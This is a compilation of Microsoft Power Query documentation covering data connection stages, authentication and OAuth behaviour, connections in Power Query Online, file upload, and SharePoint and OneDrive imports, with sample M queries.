What is Power Query?
Article • 06/28/2023
Power Query is a data transformation and data preparation engine. Power Query comes
with a graphical interface for getting data from sources and a Power Query Editor for
applying transformations. Because the engine is available in many products and services,
the destination where the data will be stored depends on where Power Query was used.
Using Power Query, you can perform the extract, transform, and load (ETL) processing of
data.
The following list describes common data challenges and how Power Query helps with each of them.

Existing challenge: Finding and connecting to data is too difficult.
How Power Query helps: Power Query enables connectivity to a wide range of data sources, including data of all sizes and shapes.

Existing challenge: Experiences for data connectivity are too fragmented.
How Power Query helps: Consistency of experience, and parity of query capabilities over all data sources.

Existing challenge: Data often needs to be reshaped before consumption.
How Power Query helps: Highly interactive and intuitive experience for rapidly and iteratively building queries over any data source, of any size.

Existing challenge: Any shaping is one-off and not repeatable.
How Power Query helps: When using Power Query to access and transform data, you define a repeatable process (query) that can be easily refreshed in the future to get up-to-date data. In the event that you need to modify the process or query to account for underlying data or schema changes, you can use the same interactive and intuitive experience you used when you initially defined the query.

Existing challenge: Volume (data sizes), velocity (rate of change), and variety (breadth of data sources and data shapes).
How Power Query helps: Power Query offers the ability to work against a subset of the entire dataset to define the required data transformations, allowing you to easily filter down and transform your data to a manageable size. Power Query queries can be refreshed manually or by taking advantage of scheduled refresh capabilities in specific products (such as Power BI) or even programmatically (by using the Excel object model). Because Power Query provides connectivity to hundreds of data sources and over 350 different types of data transformations for each of these sources, you can work with data from any source and in any shape.
The Power Query Editor is the primary data preparation experience, where you can
connect to a wide range of data sources and apply hundreds of different data
transformations by previewing data and selecting transformations from the UI. These
data transformation capabilities are common across all data sources, whatever the
underlying data source limitations.
When you create a new transformation step by interacting with the components of the
Power Query interface, Power Query automatically creates the M code required to do
the transformation so you don't need to write any code.
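For example, if you filter a column from the column's filter menu, Power Query adds a Table.SelectRows step to the query. The following minimal sketch uses an invented inline table and column name only to illustrate the kind of M code the editor generates for you:
Power Query M
let
    // Small inline table standing in for data loaded from a real source
    Source = #table({"Status", "Amount"}, {{"Active", 10}, {"Closed", 5}}),
    // The step Power Query writes when you keep only rows where Status equals "Active"
    #"Filtered Rows" = Table.SelectRows(Source, each [Status] = "Active")
in
    #"Filtered Rows"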
Note
Although two Power Query experiences exist (Power Query Desktop and Power Query Online), they both provide almost the same user experience in every scenario.
Transformations
The transformation engine in Power Query includes many prebuilt transformation
functions that can be used through the graphical interface of the Power Query Editor.
These transformations can be as simple as removing a column or filtering rows, or as
common as using the first row as a table header. There are also advanced
transformation options such as merge, append, group by, pivot, and unpivot.
All these transformations are made possible by choosing the transformation option in
the menu, and then applying the options required for that transformation. The following
illustration shows a few of the transformations available in Power Query Editor.
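As a rough illustration of what two of these transformations look like behind the user interface, the following M sketch unpivots a small invented table and then groups the result; the table and column names are hypothetical:
Power Query M
let
    // Hypothetical monthly sales data with one column per month
    Source = #table({"Product", "Jan", "Feb"}, {{"Bikes", 10, 12}, {"Helmets", 4, 6}}),
    // Unpivot: turn the month columns into attribute/value pairs
    #"Unpivoted Columns" = Table.UnpivotOtherColumns(Source, {"Product"}, "Month", "Sales"),
    // Group by: total sales per product
    #"Grouped Rows" = Table.Group(#"Unpivoted Columns", {"Product"}, {{"Total Sales", each List.Sum([Sales]), type number}})
in
    #"Grouped Rows"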
Dataflows
Power Query can be used in many products, such as Power BI and Excel. However, using
Power Query within a product limits its usage to only that specific product. Dataflows
are a product-agnostic service version of the Power Query experience that runs in the
cloud. Using dataflows, you can get data and transform data in the same way, but
instead of sending the output to Power BI or Excel, you can store the output in other
storage options such as Dataverse or Azure Data Lake Storage. This way, you can use the
output of dataflows in other products and services.
The M language is the data transformation language of Power Query. Anything that
happens in the query is ultimately written in M. If you want to do advanced
transformations using the Power Query engine, you can use the Advanced Editor to
access the script of the query and modify it as you want. If you find that the user
interface functions and transformations won't perform the exact changes you need, use
the Advanced Editor and the M language to fine-tune your functions and
transformations.
Power Query M
let
Source = Exchange.Contents("[email protected]"),
Mail1 = Source{[Name="Mail"]}[Data],
#"Expanded Sender" = Table.ExpandRecordColumn(Mail1, "Sender", {"Name"},
{"Name"}),
#"Filtered Rows" = Table.SelectRows(#"Expanded Sender", each
([HasAttachments] = true)),
#"Filtered Rows1" = Table.SelectRows(#"Filtered Rows", each ([Subject] =
"sample files for email PQ test") and ([Folder Path] = "\Inbox\")),
#"Removed Other Columns" = Table.SelectColumns(#"Filtered Rows1",
{"Attachments"}),
#"Expanded Attachments" = Table.ExpandTableColumn(#"Removed Other
Columns", "Attachments", {"Name", "AttachmentContent"}, {"Name",
"AttachmentContent"}),
#"Filtered Hidden Files1" = Table.SelectRows(#"Expanded Attachments",
each [Attributes]?[Hidden]? <> true),
#"Invoke Custom Function1" = Table.AddColumn(#"Filtered Hidden Files1",
"Transform File from Mail", each #"Transform File from Mail"
([AttachmentContent])),
#"Removed Other Columns1" = Table.SelectColumns(#"Invoke Custom
Function1", {"Transform File from Mail"}),
#"Expanded Table Column1" = Table.ExpandTableColumn(#"Removed Other
Columns1", "Transform File from Mail", Table.ColumnNames(#"Transform File
from Mail"(#"Sample File"))),
#"Changed Type" = Table.TransformColumnTypes(#"Expanded Table Column1",
{{"Column1", type text}, {"Column2", type text}, {"Column3", type text},
{"Column4", type text}, {"Column5", type text}, {"Column6", type text},
{"Column7", type text}, {"Column8", type text}, {"Column9", type text},
{"Column10", type text}})
in
#"Changed Type"
The following terms are used when describing where Power Query is available:

M engine: The underlying query execution engine that runs queries expressed in the Power Query formula language ("M").
Power Query Desktop: The Power Query experience found in desktop applications.
Power Query Online: The Power Query experience found in web browser applications.
Dataflows: Power Query as a service that runs in the cloud and is product-agnostic. The stored result can be used in other applications and services.
See also
Data sources in Power Query
Getting data
Power Query quickstart
Shape and combine data using Power Query
What are dataflows
Getting data overview
Article • 04/10/2023
Power Query can connect to many different data sources so you can work with the data
you need. This article walks you through the steps for bringing in data to Power Query
either in Power Query Desktop or Power Query Online.
Connecting to a data source with Power Query follows a standard set of stages before
landing the data at a destination. This article describes each of these stages.
Important
In some cases, a connector might have all stages of the get data experience, and in
other cases a connector might have just a few of them. For more information about
the experience of a specific connector, go to the documentation available for the
specific connector by searching on the Connectors in Power Query article.
1. Connection settings
2. Authentication
3. Data preview
4. Query destination
1. Connection settings
Most connectors initially require at least one parameter to initialize a connection to the
data source. For example, the SQL Server connector requires at least the host name to
establish a connection to the SQL Server database.
In comparison, when trying to connect to an Excel file, Power Query requires that you
use the file path to find the file you want to connect to.
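These connection parameters map directly to the arguments of the data source function in the resulting M query. The following sketch shows hypothetical values (the server name and file path are placeholders, not values from this article):
Power Query M
let
    // SQL Server: at least the host name is required; Sql.Databases lists the databases on that server
    SqlSource = Sql.Databases("myserver.example.com"),
    // Excel: the file path you provide is passed to File.Contents and then to Excel.Workbook
    ExcelSource = Excel.Workbook(File.Contents("C:\Data\Sales.xlsx"), true)
in
    ExcelSource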
Note
Some connectors don't require you to enter any parameters at all. These are called
singleton connectors and will only have one data source path available per
environment. Some examples are Adobe Analytics, MailChimp, and Google
Analytics.
2. Authentication
Every single connection that's made in Power Query has to be authenticated. The
authentication methods vary from connector to connector, and some connectors might
offer multiple methods of authentication.
For example, the available authentication methods for the SQL Server database
connector are Windows, Database, and Microsoft account.
3. Data preview
The goal of the data preview stage is to provide you with a user-friendly way to preview
and select your data.
Depending on the connector that you're using, you can preview data by using either:
Navigator window
Table preview dialog box
The object selection pane is displayed on the left side of the window. The user can
interact with and select these objects.
Note
For Power Query in Excel, select the Select multiple items option from the
upper-left corner of the navigation window to select more than one object at
a time in the object selection pane.
Note
The list of objects in Power Query Desktop is limited to 10,000 items. This limit
does not exist in Power Query Online. For a workaround in Power Query
Desktop, see Object limitation workaround.
The data preview pane on the right side of the window shows a preview of the
data from the object you selected.
Object limitation workaround
There’s a fixed limit of 10,000 objects in the Navigator in Power Query Desktop. This limit doesn’t exist in Power Query Online. Eventually, the Power Query Online UI will replace the one in the desktop. To work around this limit:
1. Right-click on the root node of the Navigator, and then select Transform Data.
2. Power Query Editor then opens with the full navigation table in the table preview
area. This view doesn't have a limit on the number of objects, and you can use
filters or any other Power Query transforms to explore the list and find the rows
you want (for example, based on the Name column).
3. Upon finding the item you want, you can get at the contents by selecting the data
link (such as the Table link in the following image).
4. Query destination
This is the stage in which you specify where to load the query. The options vary from
integration to integration, but the one option that's always available is loading data to
the Power Query editor to further transform and enrich the query.
Power Query Online experience
The stages for getting data in Power Query Online are:
1. Connection settings and authentication
2. Data preview
3. Query editor
1. Connection settings and authentication
This stage is split into two sections:
Connection settings
Connection credentials
Connection settings
In the connection settings section, you define the information needed to establish a
connection to your data source. Depending on your connector, that could be the name
of the server, the name of a database, a folder path, a file path, or other information
required by the connector to establish a connection to your data source. Some
connectors also enable specific subsections or advanced options to give you more
control and options when connecting to your data source.
Connection credentials
The first time that you use Power Query to connect to a specific data source, you're
required to create a new connection associated with that data source. A connection is
the full definition of the gateway, credentials, privacy levels, and other connector-
specific fields that make up the connection credentials required to establish a
connection to your data source.
Note
Some connectors offer specific fields inside the connection credentials section to
enable or define any sort of security related to the connection that needs to be
established. For example, the SQL Server connector offers the Use Encrypted
Connection field.
The following information is required by all connectors to define a connection:
Connection name: This is the name that you can define to uniquely identify your
connections. Note that you can't duplicate the name of a connection in your
environment.
Data gateway: If your data source requires a data gateway, select the gateway
using the dropdown list from this field.
Authentication kind & credentials: Depending on the connector, you're presented
with multiple authentication kind options that are available to establish a
connection, as well as fields where you enter your credentials. For this example, the
Windows authentication kind has been selected and you can see the Username
and Password fields that need to be filled in to establish a connection.
Privacy level: You can define the privacy level for your data source to be either
None, Private, Organizational, or Public.
Note
To learn more about what data gateways are and how to register a new gateway for
your environment or tenant, go to Using on-premises data gateway.
Important
Once you've defined a connection in Power Query Online, you can reuse the same
connection later on without reentering all this information again. The Connection field
offers a dropdown menu where you select your already defined connections. Once
you've selected your already defined connection, you don't need to enter any other
details before selecting Next.
After you select a connection from this menu, you can also make changes to the
credentials, privacy level, and other connector-specific fields for your data source in your
project. Select Edit connection, and then change any of the provided fields.
2. Data preview
The goal of the data preview stage is to provide you with a user-friendly way to preview
and select your data.
Depending on the connector that you're using, you can preview data by using either:
Navigator window
Table preview dialog box
The object selection pane is displayed on the left side of the window. The user can
interact with and select these objects.
The data preview pane on the right side of the window shows a preview of the
data from the object you selected.
3. Query editor
For Power Query Online, you're required to load the data into the Power Query editor
where you can further transform and enrich the query if you choose to do so.
Additional information
To better understand how to get data using the different product integrations of Power
Query, go to Where to get data.
Where to get data
Article • 07/28/2023
Getting data from available data sources is usually the first encounter you have with
Power Query. This article provides basic steps for getting data from each of the
Microsoft products that include Power Query.
Note
Each of these Power Query get data experiences contains different feature sets.
More information: Where can you use Power Query?
In Power BI Desktop, you can also directly select an Excel worksheet, a Power BI dataset, a SQL Server database, or Dataverse data without using the Get data option. You can also enter data directly in a table, or select from a data source that was recently used.
1. In the Home ribbon, select Get data.
2. Scroll through the category selections in the get data context menu, and select the connector you want to use.
You'll then be asked to fill out information that's required for you to access the data. Go
to the individual connector articles for more information about this required
information.
In Excel, you can also directly select Text/CSV, Web, and Excel worksheet data without
using the Get Data option. You can also select from a data source that was recently used
and from existing connections or tables.
Note
Not all Excel versions support all of the same Power Query connectors. For a
complete list of the Power Query connectors supported by all versions of Excel for
Windows and Excel for Mac, go to Power Query data sources in Excel versions .
Get data in Power BI service
To get data in Power BI service:
1. On the left side of Power BI service, select Workspaces (but not My Workspace).
2. From the Workspace context menu, select the workspace you want to use.
3. From the workspace (in this example, TestWorkspace01), select the context menu
next to +New.
6. In the Choose data source page, use Search to search for the name of the connector, or select View more on the right-hand side to see a list of all the connectors available in Power BI service.
7. If you choose to view more connectors, you can still use Search to search for the
name of the connector, or choose a category to see a list of connectors associated
with that category.
You can also choose to get data directly from an Excel worksheet without using the
Import data option.
3. In the Choose data source page, use Search to search for the name of the connector, or select View more on the right-hand side to see a list of all the available connectors.
4. If you choose to view more connectors, you can still use Search to search for the
name of the connector, or choose a category to see a list of connectors associated
with that category.
Select a table in the Tables pane that you want to import data to, and then
select Import > Import data.
Open the table to its individual pane, and then select Import > Import data.
In either case, you can also choose to get data from an Excel worksheet without
using the Import data option.
b. In the New dataflow dialog box, enter a name for your new dataflow.
c. Select Create.
1. On the left side of Customer Insights, select Data > Data sources.
4. In Save data source as, enter a name for your data source.
5. Select Next.
6. In the Choose data source page, use Search to search for the name of the connector, or select View more on the right-hand side to see a list of all the available connectors.
7. If you choose to view more connectors, you can still use Search to search for the
name of the connector, or choose a category to see a list of connectors associated
with that category.
1. On the left side of Data Factory, select Workspaces (but not My Workspace).
2. From your Data Factory workspace, select New > Dataflow Gen2 (Preview) to
create a new dataflow.
3. In Power Query, either select Get data in the ribbon or select Get data from
another source in the current view.
4. In the Choose data source page, use Search to search for the name of the connector, or select View more on the right-hand side to see a list of all the available connectors.
5. If you choose to view more connectors, you can still use Search to search for the
name of the connector, or choose a category to see a list of connectors associated
with that category.
The Analysis Services documentation contains the following information that describes
the process for getting data:
To set up a Visual Studio solution with the Analysis Services projects extension:
Create a tabular model project
1. On the left side of Power Automate, select Data > Tables. At this point, a new tab
with Power Apps will open in your browser.
2. In the Power Apps tab, follow the instructions for importing data to either a new
table or to an existing table in the Power Apps section.
For information about how to get data in process advisor, go to Connect to a data
source.
However, Azure Data Factory does use Power Query to transform data in data wrangling.
The following Azure Data Factory articles describe how to use Power Query for data
wrangling:
Getting data from available data sources is usually the first encounter you have with
Power Query. This article provides an explanation of the different modules in the
modern get data experience.
Note
Each of these Power Query get data experiences contains different feature sets.
More information: Where can you use Power Query?
The procedures for where to start getting data in Power BI Desktop are described in
Data sources in Power BI Desktop.
The new modular experience in Power Query Online is separated into different modules
located on the left side navigation bar. These modules include:
Home (all)
Templates (Power BI service only)
OneLake Data Hub (Fabric only)
New (all)
Upload (all)
Blank Table (all)
Blank Query (all)
Home
The home page acts as a summary of all the modules and presents you with different
options to expedite the process and get you closer to your data. Typically, this module
contains any existing data sources and gives you the option to use a new data source,
table, and upload files. From the home page, you can select View more on the right side
of the New sources and OneLake data hub sections to visit those modules.
Templates
A dataflow template provides a predefined set of entities and field mappings to enable
flow of data from your source to the destination, in the Common Data Model. A
dataflow template commoditizes the movement of data, which in turn reduces overall
burden and cost for a business user. It provides you with a head start to ingest data
wherein you don’t need to worry about knowing and mapping the source and
destination entities and fields—we do it for you, through dataflow templates. For more
information about templates, go to Introducing dataflow templates; A quick and
efficient way to build your sales leaderboard and get visibility over your sales pipeline .
New
The new module provides a full list of connectors that you can select from. On this page,
you can search for a connector across all categories by using the search bar at the top of
page. You can also navigate across the categories to find a specific connector to
integrate with. Selecting a connector here opens the connection settings window, which
begins the process of connecting. For more information on using connectors, go to
Getting data overview.
Upload
The Upload module lets you upload your files directly. The following connectors support
this capability:
Excel
JSON
PDF
Text/CSV
XML
This module is an extension of this capability and lets you select the browse button to
upload a local file, or even drag and drop a file. For more information on uploading files,
go to Upload a file.
Blank table
The Blank table module provides a quick start in creating a table in a dataflow.
Blank query
The Blank query module lets you write or paste your own M script to create a new
query.
Authentication with a data source
Article • 02/17/2023
When you attempt to connect to a data source using a new connector for the first time,
you might be asked to select the authentication method to use when accessing the
data. After you've selected the authentication method, you won't be asked to select an
authentication method for the connector using the specified connection parameters.
However, if you need to change the authentication method later, you can do so.
If you're using a connector from an online app, such as the Power BI service or Power
Apps, you'll see an authentication method dialog box for the OData Feed connector that
looks something like the following image.
As you can see, a different selection of authentication methods is presented from an
online app. Also, some connectors might ask you to enter the name of an on-premises
data gateway to be able to connect to your data.
The level you select for the authentication method you chose for this connector
determines what part of a URL will have the authentication method applied to it. If you
select the top-level web address, the authentication method you select for this
connector will be used for that URL address or any subaddress within that address.
However, you might not want to set the top-level address to a specific authentication
method because different subaddresses can require different authentication methods.
One example might be if you were accessing two separate folders of a single SharePoint
site and wanted to use different Microsoft accounts to access each one.
After you've set the authentication method for a connector's specific address, you won't
need to select the authentication method for that connector using that URL address or
any subaddress again. For example, let's say you select the https://contoso.com/
address as the level you want the Web connector URL settings to apply to. Whenever
you use a Web connector to access any webpage that begins with this address, you
won't be required to select the authentication method again.
In Power BI Desktop, on the File tab, select Options and settings > Data
source settings.
In Excel, on the Data tab, select Get Data > Data Source Settings.
2. In the Data source settings dialog box, select Global permissions, choose the
website where you want to change the permission setting, and then select Edit
Permissions.
You can also delete the credentials for a particular website in step 3 by selecting Clear
Permissions for a selected website, or by selecting Clear All Permissions for all of the
listed websites.
To edit the authentication method in online services, such as for dataflows in the
Power BI service and Microsoft Power Platform
This section outlines connection symptoms when the service isn't configured properly. It
also provides information on how Power Query interacts with the service when it's
properly configured.
1. Enter the Northwind endpoint in the "Get Data" experience using the OData
connector.
Supported workflow
One example of a supported service working properly with OAuth is CRM, for example,
https://*.crm.dynamics.com/api/data/v8.2 .
1. Enter the URL in the "Get Data" experience using the OData connector.
2. Select Organizational Account, and then select Sign-in to proceed to connect
using OAuth.
3. The request succeeds and the OAuth flow continues to allow you to authenticate
successfully.
When you select Sign-in in Step 2 above, Power Query sends a request to the provided
URL endpoint with an Authorization header with an empty bearer token.
The service is then expected to respond with a 401 response with a WWW-Authenticate header indicating the Azure AD authorization URI to use. This response should include
the tenant to sign into, or /common/ if the resource isn’t associated with a specific
tenant.
HTTP/1.1 401 Unauthorized
Cache-Control: private
Content-Type: text/html
Server:
WWW-Authenticate: Bearer
authorization_uri=https://login.microsoftonline.com/3df2eaf6-33d0-4a10-8ce8-
7e596000ebe7/oauth2/authorize
Date: Wed, 15 Aug 2018 15:02:04 GMT
Content-Length: 49
Power Query can then initiate the OAuth flow against the authorization_uri. Power
Query requests an Azure AD Resource or Audience value equal to the domain of the
URL being requested. This value would be the value you use for your Azure Application
ID URL value in your API/service registration. For example, if accessing https://api.myservice.com/path/to/data/api , Power Query would expect your Application ID URL value to be https://api.myservice.com .
The following Azure Active Directory client IDs are used by Power Query. You might need to explicitly allow these client IDs to access your service and API, depending on your overall Azure Active Directory settings. Go to step 8 of Add a scope for more details.

Client ID: a672d62c-fc7b-4e81-a576-e60dc46e951d
Application: Power Query for Excel
Description: Public client, used in Power BI Desktop and Gateway.
If you need more control over the OAuth flow (for example, if your service must respond
with a 302 rather than a 401 ), or if your application’s Application ID URL or Azure AD
Resource value don't match the URL of your service, then you’d need to use a custom
connector. For more information about using our built-in Azure AD flow, go to Azure
Active Directory authentication.
Connections and authentication in
Power Query Online
Article • 02/17/2023
In Power Query Online, a connection refers to the unique identifier and associated
credentials used to establish a connection to a particular data source. One convenient
feature of connections in Power Query is that you can create multiple connections
against the same data source with different credentials.
Creating a connection
During the get data experience in Power Query Online, you'll find a dialog where you
enter information to create and establish a connection to your data source. The process
is standard for all connectors in Power Query, but some connectors might require more
information in order to create a connection.
After entering the values for the connector settings in the Connection settings section,
you can proceed with the Connection credentials section. In this section, you can create
a connection specific to the connection settings you previously entered.
The following fields and sample values are used in the Connection credentials section.

Connection name: The name you can enter for your new connection. Sample value: Sample Connection.
Data gateway: An optional field that lets you bind a gateway to your connection. For cloud connections, there's no gateway binding to the connection. Sample value: none.
Authentication kind: The authentication kind you select to use that's supported by the connector. Sample value: Organizational account.
Credentials: Depending on the authentication kind you select, a contextual set of fields to input your credentials, a button to launch an OAuth2 flow, or even no fields at all (for an authentication kind such as Anonymous) is available. Sample value: derived from the OAuth2 flow, but shown as a Sign in button.
Note
By default, the field for the connection name tries to provide a default name when
you create a connection using the information from the connection settings.
After finishing the Connection settings section, you select the Next button to move
forward in the get data experience.
Tip
Some connectors provide an auto sign in experience. To learn more about this
feature, go to auto sign in.
Note
To create a gateway you can read the article on using an on-premises data
gateway in dataflows.
Using a local SQL Server database as an example, you enter the connector settings to
establish a connection. For the SQL Server connector, the required setting is just the
server name, but you can also enter the name of the database and select any other
advanced options available for the connector. For demonstration purposes, both the
server name and database have been entered.
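A query built on top of this connection would begin with a Source step along these lines (a sketch that assumes the server and database values used in this example):
Power Query M
let
    // Connection settings from this example: server "localhost", database "AdventureWorks2019"
    Source = Sql.Database("localhost", "AdventureWorks2019")
in
    Source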
After entering the values for the connector in Connection settings, you can proceed
with the Connection credentials section. In this section, you can create a connection
specific to the connection settings you previously entered.
The following fields and values are used in the Connection credentials section for this example.

Connection name: The name you can enter for your new connection. Value: localhost;AdventureWorks2019.
Data gateway: An optional field that lets you bind a gateway to your connection. Value: Mike Test.
After finishing the Connection settings section, you select the Next button to move
forward within the get data experience.
Components of a connection
Each connection is made up of a set of components. The following table contains more
information for each component.
Data source kind (required): The data source for which the connection is being established. Examples: SQL Server, File, Folder, Azure Data Lake Storage.
Data source path (required): A string that represents the values or parameters used to establish a connection to your data source. Examples: Server Name, Database Name.
Gateway (optional): Used when a gateway is needed to establish the connection and execute any query evaluation. Example: any gateway.
Privacy level (optional): Establishes the security for each connection, which is taken into consideration when queries from different connections are combined. Examples: None, Public, Organizational, Private.
Important
Currently, the privacy level is set to None for any new connections created. When
you try to combine multiple data sources, a new dialog prompts you to define the
data privacy levels of the data sources that you want to combine.
Known connections
When Power Query recognizes a set of connection settings, it tries to look up in its
respective credentials storage to see if there's a connection that matches those settings
and, if so, automatically selects that connection.
To override this behavior, you can take either of the following two actions:
Display the dropdown menu to scan a list of available connections for the given
connection settings. You can then select the one that you'd like to use or create a
new one.
Select Edit connection to modify the existing connection or select Create new
connection from the dropdown menu to create a new named connection.
More resources
List of connectors in Power Query
On-premises data gateways documentation
Change the gateway used in a dataflow
Troubleshooting dataflow issues: Connection to the data source
Auto sign in for Azure Active Directory
data sources
Article • 10/06/2022
The auto sign-in feature attempts to automatically sign you in as the current user when
connecting to data sources in Power Query that use Azure Active Directory as one of
their authentication kinds. It does this auto sign-in to expedite the authentication
process and minimize the time it takes to start working with your data.
More technically, the auto sign-in feature for Azure Active Directory data sources uses
the information derived from the currently authenticated user in the Power Query
Online experience. This information is then used to request a new access token for a
selected data source during the connection settings and authentication steps of the get
data process.
Note
This functionality is currently only available in Power Query Online and is enabled
by default for a select set of connectors. No configuration is needed to enable this
feature.
When selecting a connector that has this capability, it automatically signs you in with
Organizational account set as the authentication kind.
Tip
If you'd like to authenticate with a different account, select the Switch account link
shown in the dialog.
Further reading
Authentication in Power Query Online
Microsoft identity platform and OAuth 2.0 On-Behalf-Of flow
Upload a file (Preview)
Article • 02/17/2023
You can upload files to your Power Query project when using Power Query Online. The following connectors support uploading a file:
Excel
JSON
PDF
Text / CSV
XML
Note
Only files with the following extensions are supported for upload: .csv, .json, .pdf,
.prn, .tsv, .txt, .xl, .xls, .xlsb, .xlsm, .xlsw, .xlsx, .xml.
After you've selected your file, a progress bar shows you how the upload process is
going. Once the upload process is finished, you'll be able to see a green check mark
underneath your file name, with the message Upload successful and the file size right
next to it.
Note
The files that are uploaded through this feature are stored in your personal
Microsoft OneDrive for Business account.
Before you select the next button, you need to change the authentication kind from
Anonymous to Organizational account and go through the authentication process.
Start this process by selecting Sign in.
After going through the authentication process, a You are currently signed in message underneath the Authentication Kind selection lets you know that you've successfully
signed in. After you've signed in, select Next. The file is then stored in your personal
Microsoft OneDrive for Business account, and a new query is created from the file that
you've uploaded.
Drag and drop experience in the query editor
When using the Power Query editor, you can drop a file on either the diagram view or
the queries pane to upload a file.
When dropping the file on either of the previously mentioned sections, a dialog with the
appropriate connector settings page will be shown, based on the file extension of the
file that's being uploaded.
SharePoint and OneDrive for Business
files import
Article • 02/17/2023
Power Query offers a series of ways to gain access to files that are hosted on either
SharePoint or OneDrive for Business.
Browse files
Note
Currently, you can only browse for OneDrive for Business files of the authenticated
user inside of Power Query Online for PowerApps.
Warning
This feature requires your browser to allow third party cookies. If your browser has
blocked third party cookies, the Browse dialog will appear but it'll be completely
blank with no option to close the dialog.
Power Query provides a Browse OneDrive button next to the File path or URL text box
when you create a dataflow in PowerApps using any of these connectors:
Excel
JSON
PDF
XML
TXT/CSV
When you select this button, you'll be prompted to go through the authentication
process. After completing this process, a new window appears with all the files inside the
OneDrive for Business of the authenticated user.
You can select the file of your choice, and then select the Open button. After selecting
Open, you'll be taken back to the initial connection settings page where you'll see that
the File path or URL text box now holds the exact URL to the file you've selected from
OneDrive for Business.
You can select the Next button at the bottom-right corner of the window to continue
the process and get your data.
Note
Your browser interface might not look exactly like the following image. There
are many ways to select Open in Excel for files in your OneDrive for Business
browser interface. You can use any option that allows you to open the file in
Excel.
2. In Excel, select File > Info, and then select the Copy path button.
To use the link you just copied in Power Query, take the following steps:
3. Remove the ?web=1 string at the end of the link so that Power Query can properly
navigate to your file, and then select OK.
4. If Power Query prompts you for credentials, choose either Windows (for on-premises SharePoint sites) or Organizational Account (for Microsoft 365 or OneDrive for Business sites). Then select Connect.
Caution
When working with files hosted on OneDrive for Home, the file that you want
to connect to needs to be publicly available. When setting the authentication
method for this connection, select the Anonymous option.
When the Navigator dialog box appears, you can select from the list of tables, sheets,
and ranges found in the Excel workbook. From there, you can use the OneDrive for
Business file just like any other Excel file. You can create reports and use it in datasets
like you would with any other data source.
Note
To use a OneDrive for Business file as a data source in the Power BI service, with
Service Refresh enabled for that file, make sure you select OAuth2 as the
Authentication method when configuring your refresh settings. Otherwise, you
may encounter an error (such as, Failed to update data source credentials) when you
attempt to connect or to refresh. Selecting OAuth2 as the authentication method
remedies that credentials error.
After successfully establishing the connection, you'll be prompted with a table preview
that shows the files in your SharePoint site. Select the Transform data button at the
bottom right of the window.
Selecting the Transform Data button will take you to a view of the data called the File
system view. Each of the rows in this table represents a file that was found in your
SharePoint site.
The table has a column named Content that contains your file in a binary format. The
values in the Content column have a different color than the rest of the values in the
other columns of the table, which indicates that they're selectable.
By selecting a Binary value in the Content column, Power Query will automatically add a
series of steps in your query to navigate to the file and interpret its contents where
possible.
For example, from the table shown in the previous image, you can select the second row
where the Name field has a value of 02-February.csv. Power Query will automatically
create a series of steps to navigate and interpret the contents of the file as a CSV file.
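As a sketch of what those automatically generated steps look like in M, assuming a SharePoint folder source and the 02-February.csv file from this example (the site URL and the CSV options shown here are illustrative):
Power Query M
let
    // File system view of the SharePoint site; the URL is a placeholder
    Source = SharePoint.Files("https://contoso.sharepoint.com/marketing/data", [ApiVersion = 15]),
    // Navigate to the row for the selected file and take its binary Content value
    #"02-February csv" = Source{[Name = "02-February.csv"]}[Content],
    // Interpret the binary content as a CSV document
    #"Imported CSV" = Csv.Document(#"02-February csv", [Delimiter = ",", Encoding = 65001, QuoteStyle = QuoteStyle.None]),
    // Use the first row as column headers
    #"Promoted Headers" = Table.PromoteHeaders(#"Imported CSV", [PromoteAllScalars = true])
in
    #"Promoted Headers"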
Note
You can interact with the table by applying filters, sorts, and other transforms
before navigating to the file of your choice. Once you've finished these transforms,
select the Binary value you want to view.
https://contoso-
my.sharepoint.com/personal/user123_contoso_com/_layouts/15/onedrive.aspx
You don't need the full URL, but only the first few parts. The URL you need to use in
Power Query will have the following format:
https://<unique_tenant_name>.sharepoint.com/personal/<user_identifier>
For example:
https://contoso-my.sharepoint.com/personal/user123_contoso_com
SharePoint.Contents function
While the SharePoint folder connector offers you an experience where you can see all
the files available in your SharePoint or OneDrive for Business site at once, you can also
opt for a different experience. In this experience, you can navigate through your
SharePoint or OneDrive for Business folders and reach the folder or file(s) that you're
interested in.
SharePoint.Contents("https://contoso.sharepoint.com/marketing/data")
Note
You can also pass an optional options record as the second argument to this function, for example SharePoint.Contents("https://contoso.sharepoint.com/marketing/data", [ApiVersion="Auto"]) .
3. Power Query will request that you add an authentication method for your
connection. Use the same authentication method that you'd use for the SharePoint
files connector.
4. Navigate through the different documents to the specific folder or file(s) that
you're interested in.
For example, imagine a SharePoint site with a Shared Documents folder. You can
select the Table value in the Content column for that folder and navigate directly
to that folder.
Inside this Shared Documents folder there's a folder where the company stores all
the sales reports. This folder is named Sales Reports. You can select the Table value
on the Content column for that row.
With all the files inside the Sales Reports folder, you could select the Combine files
button (see Combine files overview) to combine the data from all the files in this
folder to a single table. Or you could navigate directly to a single file of your
choice by selecting the Binary value from the Content column.
Note
Connecting to Microsoft Graph REST APIs from Power Query isn't recommended or
supported. Instead, we recommend users explore alternative solutions for retrieving
analytics data based on Graph, such as Microsoft Graph data connect.
You might find you can make certain REST calls to Microsoft Graph API endpoints work
through the Web.Contents or OData.Feed functions, but these approaches aren't reliable
as long-term solutions.
This article outlines the issues associated with Microsoft Graph connectivity from Power
Query and explains why it isn't recommended.
Authentication
The built-in Organizational Account authentication flow for Power Query's Web.Contents
and OData.Feed functions isn't compatible with most Graph endpoints. Specifically,
Power Query's Azure Active Directory (Azure AD) client requests the user_impersonation
scope, which isn't compatible with Graph's security model. Graph uses a rich set of
permissions that aren't available through our generic Web and OData connectors.
Implementing your own Azure AD credential retrieval flows directly from your query, or
using hardcoded or embedded credentials, also isn't recommended for security reasons.
While Power BI Desktop offers out-of-box connectivity to over 150 data sources, there
might be cases where you want to connect to a data source for which no out-of-box
connector is available.
For example, the ODBC connector can connect to services with ODBC interfaces, and the
Web connector can connect to services with REST API interfaces.
Community members and organizations can also share custom connectors that they've
created. While Microsoft doesn't offer any support, ownership, or guarantees for these
custom connectors, you might be able to use them for your scenarios. The Power BI
Partner Program also includes many partners that can build custom connectors. To learn
more about the program or find a partner, go to Contact a Power BI Partner .
Users that own an end service or data source can create a custom connector and might
be eligible to certify the connector to have it made available publicly out-of-box within
Power BI Desktop.
Request the data source owner to build and
certify a connector
As only the data source owner or an approved third party can build and certify a custom
connector for any service, end users are encouraged to share the demand for a
connector directly with the data source owner to encourage investment into creating
and certifying one.
You can connect to a multitude of different data sources using built-in connectors that
range from Access databases to Zendesk resources. You can also connect to all sorts of
other data sources to further expand your connectivity options, by using the generic
interfaces (such as ODBC or REST APIs) built into Power Query Desktop and Power
Query Online.
In addition, you can also connect to data sources that aren't identified in the get data
